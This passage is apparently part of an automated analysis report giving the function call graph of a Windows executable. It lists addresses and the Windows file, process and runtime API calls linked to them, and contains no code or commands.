21333->21328 21335 7ff6ef6d4b40 GetExitCodeProcess 21333->21335 21335->21328 21337 7ff6ef6d4b53 21335->21337 21336->21314 21337->21328 21338->21120 21339->21128 21341 7ff6ef6bf979 _snwprintf 21340->21341 21342 7ff6ef6d6760 _handle_error 8 API calls 21341->21342 21343 7ff6ef6bfa00 21342->21343 21343->21128 21344->21128 21345->21126 21346->21126 21347->21128 21348->21128 21349->21128 21350->21117 21351->21124 21353 7ff6ef6d4f47 WaitForSingleObject 21352->21353 21354 7ff6ef6d4eff PeekMessageW 21353->21354 21355 7ff6ef6d4f59 21353->21355 21356 7ff6ef6d4f44 21354->21356 21357 7ff6ef6d4f1b GetMessageW TranslateMessage DispatchMessageW 21354->21357 21355->21333 21356->21353 21357->21356 21358->21318 21359->21325 21360->21332 21362 7ff6ef6c4d68 21361->21362 21397 7ff6ef6b1a98 21362->21397 21364 7ff6ef6c4d74 wcscpy 21364->21133 21366 7ff6ef6c4d3c 21365->21366 21367 7ff6ef6b1a98 74 API calls 21366->21367 21368 7ff6ef6c4d74 wcscpy 21367->21368 21368->21135 21408 7ff6ef6c0cbc 21369->21408 21371 7ff6ef6ba1d9 21418 7ff6ef6d6850 21371->21418 21373 7ff6ef6ba21a memcpy_s 21374 7ff6ef6d6850 4 API calls 21373->21374 21375 7ff6ef6ba245 21374->21375 21427 7ff6ef6ca048 21375->21427 21378 7ff6ef6ba368 21379 7ff6ef6ba37d _snwprintf 21378->21379 21381 7ff6ef6ba413 21379->21381 21466 7ff6ef6bdc28 21379->21466 21384 7ff6ef6ba47d 21381->21384 21472 7ff6ef6bab70 21381->21472 21382 7ff6ef6ba4c9 21383 7ff6ef6d6760 _handle_error 8 API calls 21382->21383 21386 7ff6ef6ba4f2 21383->21386 21384->21382 21496 7ff6ef6b145c 70 API calls 2 library calls 21384->21496 21388 7ff6ef6ba28c 21386->21388 22271 7ff6ef6bc0d8 21388->22271 21390 7ff6ef6ba29e 21391 7ff6ef6ba2b2 21390->21391 21392 7ff6ef6c6e08 83 API calls 21390->21392 21393 7ff6ef6b235c 31 API calls 21391->21393 21392->21391 21394 7ff6ef6ba2d9 21393->21394 21395 7ff6ef6c0d5c 83 API calls 21394->21395 21396 7ff6ef6ba2e2 21395->21396 21396->21141 21398 7ff6ef6b1abb 21397->21398 21402 7ff6ef6b1b25 21397->21402 21399 7ff6ef6b1ae8 21398->21399 21405 7ff6ef6b8a44 72 API calls 2 library calls 21398->21405 21399->21402 21407 7ff6ef6b8b28 72 API calls _com_raise_error 21399->21407 21401 7ff6ef6b1adc 21406 7ff6ef6b8b28 72 API calls _com_raise_error 21401->21406 21402->21364 21405->21401 21409 7ff6ef6c0cda 21408->21409 21410 7ff6ef6d6850 4 API calls 21409->21410 21411 7ff6ef6c0cff 21410->21411 21412 7ff6ef6c0d13 21411->21412 21432 7ff6ef6b74f4 21411->21432 21414 7ff6ef6d6850 4 API calls 21412->21414 21415 7ff6ef6c0d29 21414->21415 21416 7ff6ef6c0d3b 21415->21416 21417 7ff6ef6b74f4 47 API calls 21415->21417 21416->21371 21417->21416 21420 7ff6ef6d685b 21418->21420 21419 7ff6ef6d6874 21419->21373 21420->21419 21421 7ff6ef6e008c abort 2 API calls 21420->21421 21422 7ff6ef6d687a 21420->21422 21421->21420 21426 7ff6ef6d6885 21422->21426 21463 7ff6ef6d71a0 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21422->21463 21464 7ff6ef6b5414 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21426->21464 21428 7ff6ef6d6850 4 API calls 21427->21428 21429 7ff6ef6ca068 21428->21429 21430 7ff6ef6ba273 21429->21430 21465 7ff6ef6c575c 77 API calls 21429->21465 21430->21378 21437 7ff6ef6d6c4c 21432->21437 21435 7ff6ef6d6c4c 47 API calls 21436 7ff6ef6b754d memcpy_s 21435->21436 21436->21412 21438 7ff6ef6d6c7d 21437->21438 21439 7ff6ef6b7522 21438->21439 21441 7ff6ef6b7590 21438->21441 21439->21435 21444 7ff6ef6c35e8 21441->21444 21443 7ff6ef6b75a2 21443->21438 21447 7ff6ef6b247c 21444->21447 21446 7ff6ef6c3608 21446->21443 21448 7ff6ef6b2485 21447->21448 21459 7ff6ef6b2505 21447->21459 21449 7ff6ef6b2515 21448->21449 21450 7ff6ef6b24a6 21448->21450 21462 7ff6ef6b5448 47 API calls std::_Xinvalid_argument 21449->21462 21451 7ff6ef6b24c0 21450->21451 21452 7ff6ef6b24b3 21450->21452 21456 7ff6ef6d6850 4 API calls 21451->21456 21457 7ff6ef6b24bb memcpy_s 21451->21457 21460 7ff6ef6b23c0 47 API calls 3 library calls 21452->21460 21456->21457 21461 7ff6ef6b2aa4 31 API calls _invalid_parameter_noinfo_noreturn 21457->21461 21459->21446 21460->21457 21461->21459 21463->21426 21465->21430 21467 7ff6ef6bdc44 21466->21467 21468 7ff6ef6bdc78 21467->21468 21497 7ff6ef6bddb0 21467->21497 21468->21379 21471 7ff6ef6bdc5d FindClose 21471->21468 21473 7ff6ef6bab91 _snwprintf 21472->21473 21510 7ff6ef6b1500 21473->21510 21476 7ff6ef6babc8 21481 7ff6ef6bac01 21476->21481 21527 7ff6ef6b1ccc 21476->21527 21479 7ff6ef6babfd 21479->21481 21555 7ff6ef6b22c4 21479->21555 21688 7ff6ef6b16f8 21481->21688 21483 7ff6ef6d6760 _handle_error 8 API calls 21485 7ff6ef6bad43 21483->21485 21485->21381 21486 7ff6ef6baca7 21559 7ff6ef6bad5c 21486->21559 21489 7ff6ef6bac30 21489->21486 21492 7ff6ef6bdc28 15 API calls 21489->21492 21701 7ff6ef6bfcb4 CompareStringW 21489->21701 21490 7ff6ef6bacff 21490->21481 21564 7ff6ef6b4d3c 21490->21564 21575 7ff6ef6bade8 21490->21575 21492->21489 21496->21382 21498 7ff6ef6bddc9 _snwprintf 21497->21498 21499 7ff6ef6bde61 FindNextFileW 21498->21499 21500 7ff6ef6bddf7 FindFirstFileW 21498->21500 21501 7ff6ef6bde6b GetLastError 21499->21501 21503 7ff6ef6bde4b 21499->21503 21502 7ff6ef6bde09 21500->21502 21500->21503 21501->21503 21504 7ff6ef6bf630 9 API calls 21502->21504 21506 7ff6ef6d6760 _handle_error 8 API calls 21503->21506 21505 7ff6ef6bde1b 21504->21505 21507 7ff6ef6bde1f FindFirstFileW 21505->21507 21508 7ff6ef6bde3a GetLastError 21505->21508 21509 7ff6ef6bdc57 21506->21509 21507->21503 21507->21508 21508->21503 21509->21468 21509->21471 21511 7ff6ef6b151c 21510->21511 21512 7ff6ef6b74f4 47 API calls 21511->21512 21513 7ff6ef6b1533 21512->21513 21514 7ff6ef6c0cbc 47 API calls 21513->21514 21515 7ff6ef6b1540 21514->21515 21516 7ff6ef6d6850 4 API calls 21515->21516 21519 7ff6ef6b15fb 21515->21519 21517 7ff6ef6b15e9 21516->21517 21517->21519 21703 7ff6ef6b6f58 21517->21703 21710 7ff6ef6be6a0 21519->21710 21522 7ff6ef6bd0bc 21746 7ff6ef6bc990 21522->21746 21524 7ff6ef6bd0d9 21524->21476 21759 7ff6ef6bccf0 21527->21759 21528 7ff6ef6b1d1a 21537 7ff6ef6b1d37 21528->21537 21539 7ff6ef6b1eb6 21528->21539 21764 7ff6ef6b19f4 21528->21764 21531 7ff6ef6b1efd 21786 7ff6ef6b145c 70 API calls 2 library calls 21531->21786 21534 7ff6ef6b4d3c 126 API calls 21535 7ff6ef6b1f0b 21534->21535 21535->21534 21536 7ff6ef6b1f8d 21535->21536 21535->21539 21547 7ff6ef6bceb0 78 API calls 21535->21547 21536->21539 21541 7ff6ef6b1fc1 21536->21541 21787 7ff6ef6b145c 70 API calls 2 library calls 21536->21787 21537->21531 21537->21535 21537->21539 21539->21479 21540 7ff6ef6b1dd1 21540->21537 21781 7ff6ef6bceb0 21540->21781 21541->21539 21551 7ff6ef6bcfc0 76 API calls 21541->21551 21543 7ff6ef6b4d3c 126 API calls 21544 7ff6ef6b200f 21543->21544 21544->21543 21545 7ff6ef6b2084 21544->21545 21548 7ff6ef6bceb0 78 API calls 21544->21548 21553 7ff6ef6bceb0 78 API calls 21545->21553 21546 7ff6ef6bccf0 79 API calls 21546->21537 21547->21535 21548->21544 21549 7ff6ef6bccf0 79 API calls 21549->21540 21551->21544 21553->21539 21556 7ff6ef6b22f8 21555->21556 21557 7ff6ef6b22db 21555->21557 21556->21489 21810 7ff6ef6b1c60 21557->21810 22019 7ff6ef6c0e3c 21559->22019 21561 7ff6ef6bad72 22023 7ff6ef6c5e64 GetSystemTime SystemTimeToFileTime 21561->22023 21565 7ff6ef6b4d4e 21564->21565 21566 7ff6ef6b4d52 21564->21566 21565->21490 21574 7ff6ef6bcfc0 76 API calls 21566->21574 21567 7ff6ef6b4d5f 21568 7ff6ef6b4d82 21567->21568 21569 7ff6ef6b4d73 21567->21569 22087 7ff6ef6b370c 126 API calls 2 library calls 21568->22087 21569->21565 22026 7ff6ef6b42c4 21569->22026 21572 7ff6ef6b4d80 21572->21565 22088 7ff6ef6b2c84 70 API calls 21572->22088 21574->21567 21576 7ff6ef6bae0a _snwprintf 21575->21576 21581 7ff6ef6bae5c 21576->21581 21600 7ff6ef6bb279 21576->21600 22178 7ff6ef6cedf8 128 API calls 2 library calls 21576->22178 21578 7ff6ef6bbdb7 21579 7ff6ef6bbe0f 21578->21579 21580 7ff6ef6bbdbc 21578->21580 21579->21600 22225 7ff6ef6cedf8 128 API calls 2 library calls 21579->22225 21580->21600 22224 7ff6ef6b9ed4 172 API calls 21580->22224 21581->21578 21586 7ff6ef6bae79 21581->21586 21581->21600 21582 7ff6ef6d6760 _handle_error 8 API calls 21583 7ff6ef6bbdf4 21582->21583 21583->21490 21586->21600 22124 7ff6ef6b72dc 21586->22124 21588 7ff6ef6baf3d 22130 7ff6ef6bf17c 21588->22130 21590 7ff6ef6baf76 21687 7ff6ef6bceb0 78 API calls 21590->21687 21591 7ff6ef6bb07a 21595 7ff6ef6bb1b5 21591->21595 21591->21600 22181 7ff6ef6ba9f4 22 API calls 21591->22181 21593 7ff6ef6bb031 21593->21591 22179 7ff6ef6bd7c4 53 API calls 2 library calls 21593->22179 21594 7ff6ef6bb21e 22134 7ff6ef6ba2fc 21594->22134 21595->21594 21596 7ff6ef6bdc28 15 API calls 21595->21596 21596->21594 21600->21582 21601 7ff6ef6bb0f4 22180 7ff6ef6dfc34 31 API calls _invalid_parameter_noinfo_noreturn 21601->22180 21602 7ff6ef6bb58e 22191 7ff6ef6c0f28 100 API calls 21602->22191 21606 7ff6ef6bb2b3 21630 7ff6ef6bb313 21606->21630 22182 7ff6ef6b5278 47 API calls BuildCatchObjectHelperInternal 21606->22182 21610 7ff6ef6bb589 21611 7ff6ef6bb66d 21610->21611 21617 7ff6ef6bb5e7 21610->21617 21616 7ff6ef6bb6c2 21611->21616 21624 7ff6ef6bb67b 21611->21624 21612 7ff6ef6bb4e9 21612->21610 22190 7ff6ef6bd538 56 API calls 3 library calls 21612->22190 21613 7ff6ef6bb4cb 22189 7ff6ef6c361c 31 API calls _invalid_parameter_noinfo_noreturn 21613->22189 21619 7ff6ef6bb65c 21616->21619 22140 7ff6ef6ba7bc 21616->22140 21617->21619 21621 7ff6ef6bd48c 11 API calls 21617->21621 21625 7ff6ef6bb720 21617->21625 21619->21625 21632 7ff6ef6bb6c0 21619->21632 21620 7ff6ef6bc5ac 76 API calls 21620->21600 21633 7ff6ef6bb616 21621->21633 21622 7ff6ef6bb4c1 22188 7ff6ef6b28f4 70 API calls 2 library calls 21622->22188 21623 7ff6ef6bc5ac 76 API calls 21623->21600 21624->21632 22211 7ff6ef6ba508 127 API calls 2 library calls 21624->22211 21642 7ff6ef6bb793 21625->21642 21677 7ff6ef6bbd52 21625->21677 22164 7ff6ef6bc95c 21625->22164 21630->21600 21630->21613 21630->21622 22183 7ff6ef6ba018 47 API calls 21630->22183 22184 7ff6ef6c0f28 100 API calls 21630->22184 22185 7ff6ef6b28f4 70 API calls 2 library calls 21630->22185 22186 7ff6ef6c361c 31 API calls _invalid_parameter_noinfo_noreturn 21630->22186 22187 7ff6ef6ba9a0 96 API calls 21630->22187 21631 7ff6ef6be360 4 API calls 21636 7ff6ef6bb7dd 21631->21636 21632->21620 21633->21619 22192 7ff6ef6bc204 21633->22192 21637 7ff6ef6be360 4 API calls 21636->21637 21645 7ff6ef6bb7fa 21637->21645 21640 7ff6ef6bb77c 22213 7ff6ef6b8e40 74 API calls _com_raise_error 21640->22213 21642->21631 21643 7ff6ef6bb8de 21646 7ff6ef6bb8f0 21643->21646 21647 7ff6ef6bb989 21643->21647 21644 7ff6ef6bba92 21651 7ff6ef6bbab9 21644->21651 21652 7ff6ef6bbaa7 21644->21652 21665 7ff6ef6bb90d 21644->21665 21650 7ff6ef6bb87d 21645->21650 21656 7ff6ef6bc8bc 78 API calls 21645->21656 21661 7ff6ef6bb896 21645->21661 21648 7ff6ef6bb8f8 21646->21648 21649 7ff6ef6bb917 21646->21649 21659 7ff6ef6bf17c 8 API calls 21647->21659 22214 7ff6ef6b28f4 70 API calls 2 library calls 21648->22214 21649->21665 22215 7ff6ef6b9a30 114 API calls 21649->22215 21650->21661 22167 7ff6ef6bcb58 21650->22167 21654 7ff6ef6c8324 72 API calls 21651->21654 21653 7ff6ef6bc154 142 API calls 21652->21653 21653->21665 21658 7ff6ef6bbad3 21654->21658 21656->21650 21662 7ff6ef6c7f34 142 API calls 21658->21662 21663 7ff6ef6bb9bb 21659->21663 21661->21643 21661->21644 21662->21665 22216 7ff6ef6ba9f4 22 API calls 21663->22216 21672 7ff6ef6bbb41 21665->21672 22219 7ff6ef6be300 8 API calls _handle_error 21665->22219 21667 7ff6ef6bb9dd 21667->21665 21668 7ff6ef6bba11 21667->21668 21669 7ff6ef6bb9f2 21667->21669 22218 7ff6ef6bbe68 98 API calls 2 library calls 21668->22218 22217 7ff6ef6b9714 85 API calls 21669->22217 21674 7ff6ef6bbbcd 21672->21674 22220 7ff6ef6b28f4 70 API calls 2 library calls 21672->22220 21675 7ff6ef6bbc7a 21674->21675 21674->21677 21686 7ff6ef6bbccf 21674->21686 22221 7ff6ef6bd070 SetEndOfFile 21674->22221 22173 7ff6ef6bcee0 21675->22173 21677->21623 21679 7ff6ef6bbcc6 21681 7ff6ef6bc620 73 API calls 21679->21681 21680 7ff6ef6bdb64 11 API calls 21682 7ff6ef6bbd33 21680->21682 21681->21686 21682->21677 22222 7ff6ef6b28f4 70 API calls 2 library calls 21682->22222 21684 7ff6ef6bbd46 22223 7ff6ef6b8ce0 72 API calls _handle_error 21684->22223 21686->21677 21686->21680 21687->21593 21689 7ff6ef6b1718 21688->21689 21691 7ff6ef6b172c 21688->21691 21689->21691 22268 7ff6ef6b17c4 31 API calls _invalid_parameter_noinfo_noreturn 21689->22268 21692 7ff6ef6b235c 31 API calls 21691->21692 21693 7ff6ef6b1767 21692->21693 22262 7ff6ef6c0d5c 21693->22262 21695 7ff6ef6b1773 21696 7ff6ef6bad32 21695->21696 21697 7ff6ef6bc5d4 21695->21697 21698 7ff6ef6bc5cd 21695->21698 21696->21483 21699 7ff6ef6bc620 73 API calls 21697->21699 21700 7ff6ef6bc7b4 11 API calls 21698->21700 21699->21696 21700->21696 21701->21489 21702 7ff6ef6c6690 68 API calls 3 library calls 21702->21490 21720 7ff6ef6bef94 21703->21720 21705 7ff6ef6b6f6a 21706 7ff6ef6c35e8 47 API calls 21705->21706 21707 7ff6ef6b6fb7 21706->21707 21723 7ff6ef6b7244 21707->21723 21709 7ff6ef6b6fd7 21709->21519 21711 7ff6ef6be6ce memcpy_s 21710->21711 21735 7ff6ef6be530 21711->21735 21713 7ff6ef6be6f0 21714 7ff6ef6be72c 21713->21714 21716 7ff6ef6be74a 21713->21716 21715 7ff6ef6d6760 _handle_error 8 API calls 21714->21715 21717 7ff6ef6b166b 21715->21717 21739 7ff6ef6dbdc0 31 API calls 2 library calls 21716->21739 21717->21476 21717->21522 21726 7ff6ef6befd8 21720->21726 21724 7ff6ef6befd8 2 API calls 21723->21724 21725 7ff6ef6b7252 21724->21725 21725->21709 21727 7ff6ef6befee memcpy_s 21726->21727 21730 7ff6ef6c5a90 21727->21730 21733 7ff6ef6c5a44 GetCurrentProcess GetProcessAffinityMask 21730->21733 21734 7ff6ef6befce 21733->21734 21734->21705 21736 7ff6ef6be5ab 21735->21736 21738 7ff6ef6be5b3 BuildCatchObjectHelperInternal 21735->21738 21740 7ff6ef6b235c 21736->21740 21738->21713 21741 7ff6ef6b2398 21740->21741 21742 7ff6ef6b236f 21740->21742 21741->21738 21742->21741 21745 7ff6ef6dbdc0 31 API calls 2 library calls 21742->21745 21747 7ff6ef6bc9a6 _snwprintf 21746->21747 21748 7ff6ef6bc9dc CreateFileW 21747->21748 21749 7ff6ef6bcab0 21748->21749 21750 7ff6ef6bca52 GetLastError 21748->21750 21754 7ff6ef6bcafe 21749->21754 21755 7ff6ef6bcae0 SetFileTime 21749->21755 21751 7ff6ef6bf630 9 API calls 21750->21751 21752 7ff6ef6bca6d 21751->21752 21752->21749 21753 7ff6ef6bca71 CreateFileW GetLastError 21752->21753 21753->21749 21756 7ff6ef6d6760 _handle_error 8 API calls 21754->21756 21755->21754 21757 7ff6ef6bcb41 21756->21757 21757->21524 21758 7ff6ef6b8b84 72 API calls 21757->21758 21760 7ff6ef6bcd16 21759->21760 21761 7ff6ef6bcd1d 21759->21761 21760->21528 21761->21760 21763 7ff6ef6bc7f4 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21761->21763 21788 7ff6ef6b8bd0 74 API calls _com_raise_error 21761->21788 21763->21761 21765 7ff6ef6b1a17 21764->21765 21768 7ff6ef6b1a80 21764->21768 21766 7ff6ef6b1a44 21765->21766 21789 7ff6ef6b8a44 72 API calls 2 library calls 21765->21789 21766->21768 21791 7ff6ef6b8b28 72 API calls _com_raise_error 21766->21791 21772 7ff6ef6bcfc0 21768->21772 21769 7ff6ef6b1a38 21790 7ff6ef6b8b28 72 API calls _com_raise_error 21769->21790 21773 7ff6ef6bcff9 21772->21773 21775 7ff6ef6bcfdd 21772->21775 21774 7ff6ef6b1da5 21773->21774 21777 7ff6ef6bd011 SetFilePointer 21773->21777 21774->21549 21775->21774 21792 7ff6ef6b8c48 74 API calls _com_raise_error 21775->21792 21777->21774 21778 7ff6ef6bd02e GetLastError 21777->21778 21778->21774 21779 7ff6ef6bd038 21778->21779 21779->21774 21793 7ff6ef6b8c48 74 API calls _com_raise_error 21779->21793 21794 7ff6ef6bcb94 21781->21794 21784 7ff6ef6b1e86 21784->21537 21784->21546 21786->21539 21787->21541 21789->21769 21801 7ff6ef6bcba5 _snwprintf 21794->21801 21795 7ff6ef6bccad SetFilePointer 21797 7ff6ef6bcbd1 21795->21797 21799 7ff6ef6bccd5 GetLastError 21795->21799 21796 7ff6ef6d6760 _handle_error 8 API calls 21798 7ff6ef6bcc39 21796->21798 21797->21796 21798->21784 21803 7ff6ef6b8c48 74 API calls _com_raise_error 21798->21803 21799->21797 21800 7ff6ef6bcc93 21800->21795 21801->21795 21801->21797 21801->21800 21804 7ff6ef6bc8bc 21801->21804 21805 7ff6ef6bc8db 21804->21805 21808 7ff6ef6bceb0 78 API calls 21805->21808 21806 7ff6ef6bc8f4 21809 7ff6ef6bcfc0 76 API calls 21806->21809 21807 7ff6ef6bc904 21807->21800 21808->21806 21809->21807 21811 7ff6ef6b1c82 21810->21811 21814 7ff6ef6b1c7e 21810->21814 21816 7ff6ef6b1b7c 21811->21816 21814->21556 21815 7ff6ef6bceb0 78 API calls 21815->21814 21817 7ff6ef6b1ba3 21816->21817 21819 7ff6ef6b1bde 21816->21819 21818 7ff6ef6b4d3c 126 API calls 21817->21818 21822 7ff6ef6b1bc3 21818->21822 21824 7ff6ef6b51f0 21819->21824 21822->21815 21828 7ff6ef6b520c 21824->21828 21825 7ff6ef6b4d3c 126 API calls 21825->21828 21826 7ff6ef6b1c05 21826->21822 21829 7ff6ef6b2198 21826->21829 21828->21825 21828->21826 21840 7ff6ef6c570c 21828->21840 21848 7ff6ef6b4dc0 21829->21848 21834 7ff6ef6b21dd 21834->21822 21835 7ff6ef6b1a98 74 API calls 21836 7ff6ef6b220f 21835->21836 21838 7ff6ef6b2229 21836->21838 21883 7ff6ef6c66a4 MultiByteToWideChar 21836->21883 21838->21834 21839 7ff6ef6b1a98 74 API calls 21838->21839 21839->21834 21841 7ff6ef6c5715 21840->21841 21842 7ff6ef6c572f 21841->21842 21846 7ff6ef6b8a3c RtlPcToFileHeader RaiseException _com_raise_error 21841->21846 21843 7ff6ef6c5749 SetThreadExecutionState 21842->21843 21847 7ff6ef6b8a3c RtlPcToFileHeader RaiseException _com_raise_error 21842->21847 21846->21842 21847->21843 21849 7ff6ef6b4dda _snwprintf 21848->21849 21850 7ff6ef6b4e28 21849->21850 21851 7ff6ef6b4e08 21849->21851 21852 7ff6ef6b5099 21850->21852 21856 7ff6ef6b4e53 21850->21856 21914 7ff6ef6b145c 70 API calls 2 library calls 21851->21914 21955 7ff6ef6b145c 70 API calls 2 library calls 21852->21955 21855 7ff6ef6b4e14 21857 7ff6ef6d6760 _handle_error 8 API calls 21855->21857 21856->21855 21884 7ff6ef6c8324 21856->21884 21858 7ff6ef6b21d9 21857->21858 21858->21834 21880 7ff6ef6b2164 21858->21880 21860 7ff6ef6b4e9d 21861 7ff6ef6b4eb1 21860->21861 21862 7ff6ef6b4ec3 21860->21862 21866 7ff6ef6b4ec8 21860->21866 21915 7ff6ef6b145c 70 API calls 2 library calls 21861->21915 21862->21866 21870 7ff6ef6b19f4 74 API calls 21862->21870 21863 7ff6ef6b4f7b 21896 7ff6ef6be360 21863->21896 21866->21863 21879 7ff6ef6b4ebe 21866->21879 21916 7ff6ef6c0f28 100 API calls 21866->21916 21869 7ff6ef6b4fa3 21871 7ff6ef6b5022 21869->21871 21872 7ff6ef6b5018 21869->21872 21870->21866 21917 7ff6ef6c7f34 21871->21917 21900 7ff6ef6bc154 21872->21900 21875 7ff6ef6b5020 21953 7ff6ef6be300 8 API calls _handle_error 21875->21953 21877 7ff6ef6b504e 21877->21879 21954 7ff6ef6b28f4 70 API calls 2 library calls 21877->21954 21908 7ff6ef6c6e08 21879->21908 21881 7ff6ef6b19f4 74 API calls 21880->21881 21882 7ff6ef6b217e 21881->21882 21882->21835 21882->21836 21883->21838 21885 7ff6ef6c834b 21884->21885 21889 7ff6ef6c8357 21884->21889 21956 7ff6ef6b8b28 72 API calls _com_raise_error 21885->21956 21887 7ff6ef6c84cf std::bad_alloc::bad_alloc 21959 7ff6ef6d8fc8 RtlPcToFileHeader RaiseException 21887->21959 21888 7ff6ef6c84b4 std::bad_alloc::bad_alloc 21958 7ff6ef6d8fc8 RtlPcToFileHeader RaiseException 21888->21958 21889->21887 21889->21888 21890 7ff6ef6c83e7 21889->21890 21891 7ff6ef6c840f memcpy_s 21889->21891 21957 7ff6ef6c821c 72 API calls 3 library calls 21890->21957 21891->21860 21895 7ff6ef6c84eb 21897 7ff6ef6be380 21896->21897 21899 7ff6ef6be38a 21896->21899 21898 7ff6ef6d6850 4 API calls 21897->21898 21898->21899 21899->21869 21960 7ff6ef6beb40 21900->21960 21903 7ff6ef6b19f4 74 API calls 21907 7ff6ef6bc1a2 21903->21907 21905 7ff6ef6bc1df 21905->21875 21907->21905 21965 7ff6ef6c120c 21907->21965 21971 7ff6ef6c1008 21907->21971 21909 7ff6ef6c6e1c 21908->21909 21910 7ff6ef6c6e36 21909->21910 21913 7ff6ef6c6e4b 21909->21913 21981 7ff6ef6c5834 83 API calls 21910->21981 21914->21855 21915->21879 21916->21863 21918 7ff6ef6c7f69 21917->21918 21919 7ff6ef6c7f3d 21917->21919 21920 7ff6ef6c7f7a 21918->21920 22005 7ff6ef6cad50 142 API calls 2 library calls 21918->22005 21919->21920 21922 7ff6ef6c7f51 21919->21922 21923 7ff6ef6c7f5d 21919->21923 21920->21875 21982 7ff6ef6c8600 21922->21982 21948 7ff6ef6cbdde BuildCatchObjectHelperInternal 21923->21948 22006 7ff6ef6ca520 137 API calls BuildCatchObjectHelperInternal 21923->22006 21926 7ff6ef6cbda0 21928 7ff6ef6cbdef 21926->21928 22007 7ff6ef6c9060 137 API calls 21926->22007 21927 7ff6ef6cc569 21933 7ff6ef6ca948 88 API calls 21927->21933 21928->21875 21931 7ff6ef6ca948 88 API calls 21931->21948 21933->21928 21934 7ff6ef6cbdc1 21934->21928 22008 7ff6ef6c9790 137 API calls _handle_error 21934->22008 21937 7ff6ef6c1008 137 API calls 21947 7ff6ef6cc9db BuildCatchObjectHelperInternal 21937->21947 21939 7ff6ef6ccd7f 21994 7ff6ef6ca948 21939->21994 21941 7ff6ef6ccd95 BuildCatchObjectHelperInternal 21943 7ff6ef6d6760 _handle_error 8 API calls 21941->21943 21944 7ff6ef6ccde4 21943->21944 21944->21875 21947->21937 21947->21939 21988 7ff6ef6c58c8 21947->21988 22014 7ff6ef6c9060 137 API calls 21947->22014 22015 7ff6ef6cce2c 137 API calls 21947->22015 22016 7ff6ef6c5bc8 78 API calls 21947->22016 22017 7ff6ef6c8a28 88 API calls BuildCatchObjectHelperInternal 21947->22017 22018 7ff6ef6cd650 142 API calls BuildCatchObjectHelperInternal 21947->22018 21948->21927 21948->21928 21948->21931 22009 7ff6ef6c9060 137 API calls 21948->22009 22010 7ff6ef6c9790 137 API calls _handle_error 21948->22010 22011 7ff6ef6ca520 137 API calls BuildCatchObjectHelperInternal 21948->22011 22012 7ff6ef6c9238 137 API calls 21948->22012 22013 7ff6ef6c7104 88 API calls 21948->22013 21953->21877 21954->21879 21955->21855 21957->21891 21958->21887 21959->21895 21961 7ff6ef6beb64 GetVersionExW 21960->21961 21962 7ff6ef6beb97 21960->21962 21961->21962 21963 7ff6ef6d6760 _handle_error 8 API calls 21962->21963 21964 7ff6ef6bc16e 21963->21964 21964->21903 21966 7ff6ef6c1232 BuildCatchObjectHelperInternal 21965->21966 21967 7ff6ef6c124b 21965->21967 21969 7ff6ef6c1279 21966->21969 21970 7ff6ef6be488 83 API calls 21966->21970 21967->21966 21968 7ff6ef6bd0f4 79 API calls 21967->21968 21968->21966 21970->21969 21973 7ff6ef6c118d 21971->21973 21977 7ff6ef6c1051 BuildCatchObjectHelperInternal 21971->21977 21972 7ff6ef6c11da 21974 7ff6ef6c570c SetThreadExecutionState RtlPcToFileHeader RaiseException 21972->21974 21973->21972 21975 7ff6ef6b775c 8 API calls 21973->21975 21976 7ff6ef6c11df 21974->21976 21975->21972 21976->21907 21977->21973 21977->21976 21978 7ff6ef6cedf8 128 API calls 21977->21978 21979 7ff6ef6be488 83 API calls 21977->21979 21980 7ff6ef6bccf0 79 API calls 21977->21980 21978->21977 21979->21977 21980->21977 21984 7ff6ef6c861c memcpy_s 21982->21984 21983 7ff6ef6c870e 21983->21947 21984->21983 21985 7ff6ef6d6c4c 47 API calls 21984->21985 21986 7ff6ef6c86a9 memcpy_s 21984->21986 21985->21986 21986->21983 21987 7ff6ef6b8b28 72 API calls 21986->21987 21987->21986 21989 7ff6ef6c58e9 21988->21989 21992 7ff6ef6c58ee 21988->21992 21990 7ff6ef6c5990 76 API calls 21989->21990 21990->21992 21991 7ff6ef6c58ff 21991->21947 21992->21991 21993 7ff6ef6c5bc8 78 API calls 21992->21993 21993->21991 21999 7ff6ef6cabae 21994->21999 22002 7ff6ef6ca999 BuildCatchObjectHelperInternal 21994->22002 21995 7ff6ef6cac6d 21996 7ff6ef6cac8a 21995->21996 21997 7ff6ef6ca60c 88 API calls 21995->21997 21996->21941 21997->21996 21998 7ff6ef6ca60c 88 API calls 21998->22002 21999->21995 22000 7ff6ef6c705c 74 API calls 21999->22000 22000->21995 22001 7ff6ef6b19f4 74 API calls 22001->22002 22002->21998 22002->21999 22002->22001 22003 7ff6ef6c76f8 74 API calls 22002->22003 22004 7ff6ef6c120c 88 API calls 22002->22004 22003->22002 22004->22002 22005->21920 22006->21926 22007->21934 22008->21948 22009->21948 22010->21948 22011->21948 22012->21948 22013->21948 22014->21947 22015->21947 22016->21947 22017->21947 22018->21947 22020 7ff6ef6c0e52 22019->22020 22022 7ff6ef6c0e5a 22019->22022 22021 7ff6ef6bc8bc 78 API calls 22020->22021 22021->22022 22022->21561 22024 7ff6ef6d6760 _handle_error 8 API calls 22023->22024 22025 7ff6ef6bacbd 22024->22025 22025->21490 22025->21702 22027 7ff6ef6b42ed _snwprintf 22026->22027 22028 7ff6ef6b4356 22027->22028 22036 7ff6ef6b436e 22027->22036 22045 7ff6ef6b44ef 22027->22045 22099 7ff6ef6b145c 70 API calls 2 library calls 22028->22099 22031 7ff6ef6b438d 22100 7ff6ef6b530c 78 API calls 22031->22100 22033 7ff6ef6d6760 _handle_error 8 API calls 22035 7ff6ef6b4d14 22033->22035 22034 7ff6ef6b4404 22102 7ff6ef6b50d4 96 API calls 22034->22102 22035->21572 22036->22031 22036->22034 22101 7ff6ef6b5278 47 API calls BuildCatchObjectHelperInternal 22036->22101 22039 7ff6ef6b4ceb 22117 7ff6ef6b2c84 70 API calls 22039->22117 22041 7ff6ef6b45e9 22041->22031 22041->22039 22043 7ff6ef6c0bcc 79 API calls 22041->22043 22044 7ff6ef6b465d 22043->22044 22044->22031 22050 7ff6ef6b466a 22044->22050 22089 7ff6ef6c0bcc 22045->22089 22046 7ff6ef6b4552 22106 7ff6ef6b28f4 70 API calls 2 library calls 22046->22106 22049 7ff6ef6b441d 22049->22045 22049->22046 22103 7ff6ef6b28f4 70 API calls 2 library calls 22049->22103 22104 7ff6ef6b50d4 96 API calls 22049->22104 22105 7ff6ef6b7788 100 API calls _handle_error 22049->22105 22052 7ff6ef6b46f6 